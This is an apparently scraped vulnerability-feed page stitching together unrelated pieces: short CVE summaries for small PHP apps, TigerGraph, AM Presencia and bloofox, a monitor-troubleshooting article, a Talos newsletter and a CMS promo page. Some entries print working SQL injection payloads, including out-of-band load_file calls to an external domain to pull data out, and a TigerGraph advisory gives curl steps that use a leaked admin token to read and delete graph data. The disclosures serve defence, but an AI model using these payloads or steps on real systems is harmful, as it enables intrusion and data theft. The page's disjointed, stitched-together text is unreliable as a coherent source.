A vulnerability has been found in Campcodes Video Sharing Website 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file signup.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-225913 was assigned to this vulnerability.

Permalink

main

Switch branches/tags

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Go to file

*   Go to file

*   Copy path
*   Copy permalink

E1CHO Add files via upload

Latest commit ff8a393 Apr 14, 2023

**History**

**1** contributor

**Users who have contributed to this file**

153 KB

Download

*   Open with Desktop
*   Download
*   Delete file

Sorry, something went wrong. Reload?

Sorry, we cannot display this file.

Sorry, this file is invalid so it cannot be displayed.

CVE-2023-2035: cve_hub/Video Sharing Website vuln 3.pdf at main · E1CHO/cve_hub

Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php.

The password parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load\_file('\\\\907tu6mdwzuv9ctlt93eg10er5xyls9jc74uvik.stupid.com\\aej'))+' was submitted in the password parameter. This payload injects a SQL sub-query that calls MySQL's load\_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.

\--\-
Parameter: password (POST)
    Type: boolean\-based blind
    Title: OR boolean\-based blind \- WHERE or HAVING clause
    Payload: username\=pwKLHXbY&password\=\-4290') OR 6172=6172 AND ('XovE'\='XovE

    Type: error\-based
    Title: MySQL \>= 5.0 OR error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username\=pwKLHXbY&password\=j3X!k3l!R0'+(select load\_file('\\\\\\\\907tu6mdwzuv9ctlt93eg10er5xyls9jc74uvikkc0rcehfjmie8te5szqd23hxgomfa5yu.stupid.com\\\\aej'))+'') OR (SELECT 8766 FROM(SELECT COUNT(\*),CONCAT(0x717a6a6b71,(SELECT (ELT(8766=8766,1))),0x7162767871,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND ('dncG'\='dncG

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: username\=pwKLHXbY&password\=j3X!k3l!R0'+(select load\_file('\\\\\\\\907tu6mdwzuv9ctlt93eg10er5xyls9jc74uvikkc0rcehfjmie8te5szqd23hxgomfa5yu.stupid.com\\\\aej'))+'') AND (SELECT 7405 FROM (SELECT(SLEEP(3)))pVNf) AND ('fltf'\='fltf
\--\-

CVE-2023-29622: CVE-nu11secur1ty/vendors/oretnom23/2023/Purchase-Order-Management-1.0/SQLi at main · nu11secur1ty/CVE-nu11secur1ty

Yoga Class Registration System 1.0 was discovered to contain a SQL injection vulnerability via the cid parameter at /admin/login.php.

The cid parameter appears to be vulnerable to Multiple-SQL injection attacks. The payload '+(select load\_file('\\\\aaob4nk5vd0lv9e50qp2c5c1dsjl7iv9yxpkg85.stupid.com\\shs'))+' was submitted in the cid parameter. This payload injects a SQL sub-query that calls MySQL's load\_file function with a UNC file path that references a URL on an external domain. The attacker easily can steal all information about this server and this could be awful for all users of this system.

\--\-
Parameter: cid (GET)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause
    Payload: p\=yclasses/registration&cid\=158158925' or '6060'\='6060' AND 7469=7469 AND 'IrlM'\='IrlM

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: p\=yclasses/registration&cid\=158158925' or '6060'\='6060' AND (SELECT 6894 FROM(SELECT COUNT(\*),CONCAT(0x71786b7071,(SELECT (ELT(6894=6894,1))),0x716a6a7871,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'CykB'\='CykB

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: p\=yclasses/registration&cid\=158158925' or '6060'\='6060' AND (SELECT 9785 FROM (SELECT(SLEEP(3)))edGv) AND 'KLgd'\='KLgd
\--\-

CVE-2023-29626: CVE-nu11secur1ty/vendors/oretnom23/2023/Yoga-Class-Registration -1.0-2023 - Multiple-SQLi at main · nu11secur1ty/CVE-nu11secur1ty

By Owais Sultan
If you encounter a “No signal” issue on your monitor despite your computer being powered on, and you…
This is a post from HackRead.com Read the original post: Troubleshooting No Signal Monitor Issue: Steps to Get Computer Display Back

If you encounter a “No signal” issue on your monitor despite your computer being powered on, and you receive messages such as “No signal detected,” “Check signal cable,” or “No input signal,” regardless of the type of connection (HDMI, VGA, Display Port, DVI), this article will provide you with some simple solutions to help you restore your computer display.

****The Root of the Issue****

If your computer doesn’t turn on when indicator lights are on or turn on when they are off, there could be several reasons. You may encounter three different error messages on your monitor screen that can help identify the issue.

⚠️ No input signal

⚠️ Check signal cable

⚠️ No signal detected

All these notifications indicate that the input is not receiving the supported video signal, and the underlying reason is the same. However, the specific alerts may vary depending on your monitor.

Regardless, it’s important to take your time before sending your computer for repair, as various factors such as the power supply, motherboard, cable, or battery can affect the performance of your equipment.

To troubleshoot and potentially fix the issue, you can take specific steps to identify the cause of the malfunction and attempt to resolve it on your own. Alternatively, you can seek assistance from experts at consulting service Howly for an easier solution. If you prefer to tackle the problem independently, the following information will be helpful.

****Essential Ways to Solve the Problem****

It’s important to start by considering the simple and common causes of the problem, along with their corresponding solution methods. It’s crucial not to skip any point, even if you believe everything is okay with it.

*   Make sure to check if the cable connecting the monitor or PC video card is securely connected and not disconnected. Sometimes, accidental impacts or movements can loosen the cable.
*   If you have recently upgraded your monitor or video card and connected it using an adapter or cable with different interfaces (e.g., Display Port to HDMI, HDMI to VGA/DVI), keep in mind that these cables or adapters can sometimes be the source of problems. Some of them are unidirectional, and others may only work with specific equipment (e.g., video cards that support analogue output via HDMI).

Proper solutions to consider are: Try to connect using the same type of ports or at least digital output to digital input. Avoid using adapters or opt for an active signal converter. Consider using the monitor’s original cable without adapters.

*   If you have connected your computer to a second monitor, projector, or TV, turn off your computer, unplug the TV cable from the video card, then turn the computer back on and check if the “No signal detected” or “Check the signal cable” problem is resolved.
*   If your monitor menu has an input source selection option, open the menu and manually select the input signal used.
*   Connect your monitor to another computer or laptop to rule out a problem with the monitor itself or its ports. If there is no signal on the other computer as well, the issue likely lies with the monitor itself.
*   If your computer previously had a discrete video card, but you now connect the monitor to the integrated video output on the motherboard and receive a “No signal” message, it may be due to disabled integrated video in the BIOS, PCI-E video card priority setting in the BIOS, or the processor lacking integrated video.
*   Some older graphics cards may not output a signal to the Display Port before the drivers are loaded during system boot. If you have just assembled a computer with such a video card or are reinstalling the operating system from a USB flash drive, and the monitor is connected via Display Port, there may be no signal.
*   If you have purchased a new monitor with a USB-C/Thunderbolt connection and connected it to a laptop, check the laptop specifications as not all laptops support display output via USB-C. It is recommended to use the “native” cable provided with the monitor, as not all USB-C cables may support video/audio output to the monitor.

****Heavier Artillery****

If the previously mentioned solutions did not work, here are some other possible options to consider, although they may be more complex than the previous ones, they can still be applied at home.

*   If you have integrated video, you can try disconnecting the discrete graphics card and connecting the monitor to the integrated video output to see if that resolves the issue. If it does, possible causes could be: additional power not connected to the discrete video card, hardware problems with the video card, insufficient power from the power supply unit, or issues with the slot where the video card is plugged in.
*   If your computer appears to be working with fans running and indicator lights on, but there is no signal on the monitor, it may not necessarily mean that the computer is fully functional. Issues with the video card, power supply, RAM, or motherboard power connections can prevent the computer from starting and displaying a signal on the monitor.
*   If your computer starts but the monitor shows a POST/BIOS or logo screen followed by a “No signal” or “Signal is out of range” message, there may be an issue with the output settings of your operating system.

One possible solution is to boot into safe mode and use restore points or boot from a USB flash drive with the same version of the OS you have installed, then select “System Restore” on the second screen at the bottom left corner and use the restore points.

In Windows 10, you can access the recovery environment (Windows RE) after two forced shutdowns. Alternatively, you may need to consider reinstalling the operating system.

****Conclusion****

If you haven’t been able to find a solution for the “No signal” monitor issue, you can always seek help from specialists. It’s important to prepare all the necessary information for them, such as the model of your video card and monitor, details about the connection setup, what might have caused the issue, and what troubleshooting steps you have already taken. With this information, the experts will be able to provide a tailored solution for your specific case.

1.  How to Teach Your Child Coding
2.  What to Do If Your Mac Keeps Freezing
3.  How to Create and Manage Groups on iPhone
4.  Top 5 macOS Monterey Issues You Might Need to Fix
5.  How to Hide Tables in SQL Server Management Studio

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

Troubleshooting No Signal Monitor Issue: Steps to Get Computer Display Back

An issue was discovered in TigerGraph Enterprise Free Edition 3.x. It creates an authentication token for internal systems use. This token can be read from the configuration file. Using this token on the REST API provides an attacker with anonymous admin-level privileges on all REST API endpoints.

The TigerGraph platform provides users with a REST API that allows authenticated users the ability to load data into the database, query the database, and update the database.

This report highlights that an authentication token – that is used internally by the TigerGraph system – can be read from configuration files stored on the TigerGraph platform. And that anyone using this token is granted administrative privileges across all REST API endpoints. Thereby, allowing an attackerto read and write to any graph in the platform.

**Impact**

Severe.

Unauthorized users can exfiltrate or corrupt any data contained within the TigerGraph platform.

**Products/Versions Affected**

*   TigerGraph Enterprise Free Edition 3.7.0 Docker Image
*   TigerGraph Enterprise Free Edition 3.7.0
*   TigerGraph Cloud

We suspect that this vulnerability is present in all existing TigerGraph products (although this is not confirmed).

**Steps to Reproduce****Download and Run TigerGraph**

Using docker download at the latest TigerGraph image and start the server:

**1.) Optional: clean-up old TigerGraph docker images and obtain the latest version:**

docker rm tigergraph
docker pull docker.tigergraph.com/tigergraph:latest

**2.) Download and run the docker image (note: we do not need to attach a volume):**

docker run -d 
-p 14022:22 
-p 9000:9000 
-p 14240:14240 
--name tigergraph 
--ulimit nofile=1000000:1000000 
-t docker.tigergraph.com/tigergraph:latest

**3.) Once the container has started, connect to it via ssh (note: the default password is ‘tigergraph’):**

ssh -p 14022 tigergraph@localhost

**4.) Start all TigerGraph services:**

gadmin start all

**5.) Using GSQL, create a new graph called test and add a node to it:**

 $ gsql
GSQL> CREATE VERTEX Node(PRIMARY\_ID id UINT, value STRING) WITH primary\_id\_as\_attribute="true"
GSQL> CREATE GRAPH test(\*)
GSQL> begin
GSQL> CREATE QUERY ins(UINT id, STRING value) FOR GRAPH test {
GSQL>   INSERT INTO Node VALUES(id, value);
GSQL> }
GSQL> end
GSQL> interpret query ins(1,"hello”)

**6.) Enable RESTPP authentication**

gadmin config set RESTPP.Factory.EnableAuth true
gadmin config apply -y
gadmin restart restpp nginx gui gsql -y

**Obtaining Administrative Credentials**

To demonstrate that the administrative level web credentials are readily obtainable we download them via the AdminPortal. Although, this step assumes that the login credentials of the administrative user are known; a situation that is plausible (see CVE-2022-xxxxx which details how to locate the login credentials of the administrative user within the system logs).

If however, the login credentials are not known, the web credentials can also be exfiltrated from the TigerGraph platform using the technique described in CVE-2022-xxxxx where a user with low-levels of privilege is able to exploit a weakness in GSQL to load data from arbitrary files into the database. We also found that it is possible to exfiltrate these web credentials under normal operating conditions by exploiting GSQL’s UDF facility to read arbitrary files (see CVE-2022-30331).

**Login To The AdminPortal**

The simplest way to obtain the administrative users login credentials is using AdminStudio and to do this follow these steps:

**1.) Open a web-browser and go to http://localhost:14240 where you will be able to login to GraphStudio using the tigergraph user:**

**2.) Click on the “Admin” button on the top-right corner to switch into administrative mode (called the AdminPortal).**

**Downloading Web Credentials via AdminPortal**

Once logged into the AdminPortal follow the following steps to download the TigerGraph configuration file:

1.  On the left-hand side expand the “Others” menu.
2.  Click on “GSQL Output File” to open the file preview pane.
3.  In the “File path” textbox enter the text “/home/tigergraph/tigergraph/data/configs/tg.cfg“.
4.  Click “Preview” to check that the file exists – if it does the first few lines will be displayed.
5.  Finally, click “Download” and the file will be downloaded to your local computer. On our system it was called m1\_tg.cfg.

**Note**: When tested we found that the GUI was unable to download files that were symbolically linked. So if the files that you download in step 5 are corrupted follow the steps in the next sections to find the location of the actual file.

**Symbolic Linking Issue**

Once logged into AdminPortal perform the following steps:

1.  On the left-hand side expand the “Monitor” menu.
2.  Click on “Logs” to open the window that allows you to search through the system logs.
3.  In the “Pattern” textbox enter the text “LinkFilePath“.
4.  Under components de-select all components except “CONTROLLER”.
5.  Click “Search” to perform the search and return any matches.
6.  Finally, click on any match from the controller log file. (The file name starts “/controller” and ends in “.log”). Doing this will take you to the entry in the log file (shown below).

Once inside the log file you need to locate both the LinkFilePath and the SourceFilePath entries for tg.cfg. In the screenshot above we found these values to be:

*   LinkFilePath:"/home/tigergraph/tigergraph/data/configs/tg.cfg"
*   SourceFilePath:"tg.cfg.eyJDb3VudGVyIjoxMTEsIk1ldGFWZXJzaW9uIjoidjEiLCJWZXJzaW9uIjoxNjU1NDk2NDg0NjIwMjIxNjkyfQ=="
*   tg.cfg.eyJDb3VudGVyIjoxMTEsIk1ldGFWZXJzaW9uIjoidjEiLCJWZXJzaW9uIjoxNjU1NDk2NDg0NjIwMjIxNjkyfQ==

Now to construct the absolute file path to the configuration file replace tg.cfg in LinkFilePath to the value specified by SourceFilePath. In our example, this created the following path: /home/tigergraph/tigergraph/data/configs/tg.cfg.eyJDb3VudGVyIjoxMTEsIk1ldGFWZXJzaW9uIjoidjEiLCJWZXJzaW9uIjoxNjU1NDk2NDg0NjIwMjIxNjkyfQ==

To download this file repeats the same process as described in the section Downloading Web Credentials via AdminPortal but instead use the path that we calculated in this section.

**Using The Administrative Web Token Credentials To Obtain Access**

Once the SSH credentials of the administrative user have been obtained they can be used to authenticate with the remote TigerGraph server and obtain shell access as the administrative user without requiring a password.

**1.) Locate the value of the administrative AuthToken in the configuration file that you obtained. This can either be done using the linux command line as shown below (or opening the file in a text editor and using the in-build find functionality):**

cat m1\_tg.cfg | grep AuthToken

"\\"MaxAuthTokenLifeTimeSec\\": 0",
"\\"AuthToken\\": \\"9voePXkP0GlojPpj6PZ2vWU6sSrQQHbe\\"",

**2.) Do a quick sanity test to check that authentication is enabled on the REST API:**

curl -X GET http://127.0.0.1:9000/graph/test/vertices/Node
{"version":{"edition":"enterprise","api":"v2","schema":1},"error":true,"message":"Access Denied because the input token = '' is empty","code":"REST-10016"}%

**3.) Now we are able to send requests to REST APIs using our administrative AuthToken. Below we use it to return a list of vertices from our test graph:**

curl -X GET \\
-H 'Authorization: Bearer 9voePXkP0GlojPpj6PZ2vWU6sSrQQHbe' \\
http://localhost:9000/graph/test/vertices/Node
{"version":{"edition":"enterprise","api":"v2","schema":1},"error":false,"message":"","results":\[{"v\_id":"1","v\_type":"Node","attributes":{"id":1,"value":"hello"}}\]}%

**4.) We can use these REST endpoints to create/read/updated/delete any graph in the system. Below we use the administrative token to delete a vertex and then do a check it was deleted:**

curl -X DELETE \\
-H 'Authorization: Bearer 9voePXkP0GlojPpj6PZ2vWU6sSrQQHbe' \\
http://localhost:9000/graph/test/vertices/V1
{"version":{"edition":"enterprise","api":"v2","schema":1},"error":false,"message":"","results":{"v\_type":"V1","deleted\_vertices":1}}%

curl -X GET \\
-H 'Authorization: Bearer 9voePXkP0GlojPpj6PZ2vWU6sSrQQHbe' \\
http://localhost:9000/graph/test/vertices/V1
{"version":{"edition":"enterprise","api":"v2","schema":1},"error":false,"message":"","results":\[\]}%

CVE-2023-22951: Unsecured Web Credentials

Auto Dealer Management System v1.0 was discovered to contain a SQL injection vulnerability.

\[CVE ID\]

CVE-2023-27667

\[PRODUCT\]

Auto Dealer Management System - v 1.0

\[VERSION\]

Auto Dealer Management System - v 1.0

\[PROBLEM TYPE\]

SQL Injection

\[DESCRIPTION\]

SQL Injection on page view\_car\_type.php and parameter is id, application url is (/view\_car\_type.php?id=?)

Can be called without authorized access.

CVE-2023-27667: CVE-2023-27667

An issue was discovered in TigerGraph Enterprise Free Edition 3.x. Data loading jobs in gsql_server, created by any user with designer permissions, can read sensitive data from arbitrary locations.

CVE-2023-22950: Data Loading Vulnerability

Microsoft zero-days, dark web forum takedowns and Pentagon leaks on Discord in this week's newsletter.

Thursday, April 13, 2023 14:04

Welcome to this week’s edition of the Threat Source newsletter.

Law enforcement organizations across the globe notched a series of wins over the past few weeks against online forums for cybercriminals.

On March 23, the FBI announced it disrupted the online cybercriminal marketplace BreachForums, known for being a place where users could buy and sell stolen user information. They also arrested a 20-year-old suspected of being the site’s founder and main administrator.

Then last week we had “Operation Cookie Monster” in which several international agencies worked together to take down Genesis Market, a similar dark web forum, arresting dozens of suspected users and administrators.

These arrests and network operations are important in that they disrupted sites that were known for highly sensitive information and served as a place for some of the most prolific cyber criminals to make money. The U.S. Department of Justice estimated that Genesis Market was responsible for the sale of data on more than 1.5 million compromised computers around the world containing over 80 million account access credentials. And the U.K.’s National Crime Agency (NCA) said credentials were available for as little as 70 cents to hundreds of dollars depending on the stolen data available.

But the user base for these sites was also huge (after all, someone had to be buying those credentials). At the time of its takedown, BreachForums had 340,000 members, according to the FBI. And reporting on Operation Cookie Monster stated that Genesis Market had 59,000 registered users.

So while it’s great that these sites have been disrupted, I can’t help but assume that two more sites are going to pop up to service these cyber criminals. It’s impossible for any agency to arrest 340,000 people, so even if a handful of administrators are restricted from accessing the internet for a while, the other 339,000 people are going to be looking for a new home.

Some of the same agencies celebrated in March 2021 that they disrupted Emotet, one of the most infamous botnets ever. As anyone who follows security news will know, Emotet didn’t actually go anywhere and was recently rebooted as recently as last month, according to our research.

RaidForums, a forefather of BreachForums, was also disrupted in April 2022, along with the arrest of several administrators and accomplices.

All of this is not to discount the great strides made in the past few weeks in disrupting these marketplaces and taking them offline. But a lot of these headlines are sounding familiar to me after a few years, so it’s important to remember that we as a security community can’t take our foot off the gas and assume that because there were a few big wins that dark web forums are just going to go away forever.

**The one big thing**

Microsoft’s Patch Tuesday for April included another zero-day vulnerability in the Windows Common Log File System Driver. CVE-2023-28252, which could allow an attacker to obtain SYSTEM privileges, is actively being exploited in the wild, according to Microsoft. The U.S. Cybersecurity and Infrastructure Security Agency already added the vulnerability to its list of know exploited issues and urged federal agencies to patch it as soon as possible. Microsoft disclosed a similar zero-day issue in September that could also lead to the same privileges: CVE-2022-37969.

**Why do I care?**

Security researchers say that the vulnerability has already been exploited in Nokoyawa ransomware attacks, so it’s important to patch this issue as soon as possible. The Nokoyawa ransomware is known for targeting 64-bit Windows systems in double extortion attacks in which the actors encrypt targets’ files and then threaten to leak them unless the ransom is paid.

**So now what?**

Microsoft has a patch available, so all Windows users should update now if they haven’t already. Talos also has new Snort detection coverage available for CVE-2023-28252 and other vulnerabilities disclosed as part of Patch Tuesday.

**Top security headlines of the week**

**A trove of classified military documents and images leaked on several social media channels** over the past week, including potentially sensitive information on Russia’s invasion of Ukraine and China’s military plans. The images first surfaced in a Discord channel, eventually making their way onto the Telegram messaging app, the popular forum 4Chan and then broader social media sites like Twitter. The U.S. Department of Justice and the Pentagon have since launched a formal investigation into the leaks. Ukrainian officials have blamed Russian actors for the leaks, trying to cast doubt on the authenticity of the images, while Russia accused Western governments of trying to spread disinformation. (Bellingcat, New York Times)

**Apple released patches for two zero-day vulnerabilities** targeting current and older versions of iOS, iPadOS, macOS and Safari that attackers were exploiting in the wild. The vulnerabilities, CVE-2023-28206 and CVE-2023-28205, could lead to arbitrary code execution. CVE-2023-28206 specifically could allow an adversary to execute code with kernel privileges. Apple initially patched the issue in current iPhones and other devices and followed up a few days later with fixes for older hardware like the iPhone 8. This was the third instance of Apple patching a zero-day vulnerability since the start of the year. (SC Media, Security Week)

**The FBI warned users again this week against plugging their phones in public charging stations** at common spaces like airports, hotels and shopping centers. The agency stated that threat actors have found ways to use the public USB ports to “introduce malware and monitoring software onto devices." Instead, the Federal Communications Commission suggests users carry their own USB cables and charging blocks to plug directly into outlets rather than relying on or trusting a cable. However, the tweet from the FBI’s Denver office did not offer examples of any recent attacks that would have prompted a fresh warning. (Axios, NBC News)

**Can’t get enough Talos?**

*   How threat actors are using AI and other modern tools to enhance their phishing attempts
*   How do you hunt cybersecurity threats in a war zone? Like this
*   Cisco unveils latest security trends from Cisco Talos report at GISEC 2023
*   Researcher Spotlight: Giannis Tziakouris first learned how to fix his family’s PC, and now he’s fixing networks all over the globe

**Upcoming events where you can find Talos**

**RSA** **(April 24 - 27)**

San Francisco, CA

**Cisco Talos Incident Response: On Air** **(April 27)**

Virtual

**Cisco Live U.S.** **(June 4 - 8)**

Las Vegas, NV

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** e248b01e3ccde76b4d8e8077d4fcb4d0b70e5200bf4e738b45a0bd28fbc2cae6  
**MD5:** 1e2a99ae43d6365148d412b5dfee0e1c  
**Typical Filename:** PDFpower.exe  
**Claimed Product:** PdfPower  
**Detection Name:** Win32.Adware.Generic.SSO.TALOS

**SHA 256:** f3d5815e844319d78da574e2ec5cd0b9dd0712347622f1122f1cb821bb421f8f  
**MD5:** a2d60b5c01a305af1ac76c95e12fdf4a  
**Typical Filename:** KMSAuto.exe  
**Claimed Product:** N/A  
**Detection Name:** W32.File.MalParent

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

Threat Source newsletter (April 13, 2023) — Dark web forum whac-a-mole

AM Presencia v3.7.3 was discovered to contain a SQL injection vulnerability via the user parameter in the login form.

CVE-2023-27779: alo.com

bloofox v0.5.2 was discovered to contain an arbitrary file deletion vulnerability via the delete_file() function.

**Welcome to bloofoxCMS**

  
bloofoxCMS is a free open source content management system (CMS). bloofoxCMS is a small and easy to use CMS. It enables you to manage websites and intranet sites on a very simple way. It is slim but also flexible. You may use and download it **free of charge** without any limitations. But it would be a great pleasure to receive a small donation.

  
\[ Features \] \[ Download \]

**bloofoxCMS Key Features**

  

Very **easy installation** over web browser by using an automated install process with only 2 steps. If you prefer a manual setup just use our SQL dump files.

**Easy to use admin panel** with structured areas. You need only a short training period. The Admincenter includes an intuitive user interface.

More simply and fast expandable program code also for PHP beginners. Every php developer is able to extend the code with additional individual code lines.

Fast customization und creation of individual template designs with HTML or XHTML and CSS (cascading stylesheets). Our **templates are completely free of PHP code**. Even web designers without PHP knowledge can create templates.

   

  
**Latest News**

bloofoxCMS 0.5.2.1 available

Read more

bloofoxCMS 0.5.1 available

Read more

bloofoxCMS now available on github

Read more

**Make a donation**

You may help us by making a little donation. Please click the image beside. Thanks for your support!

Tag

#sql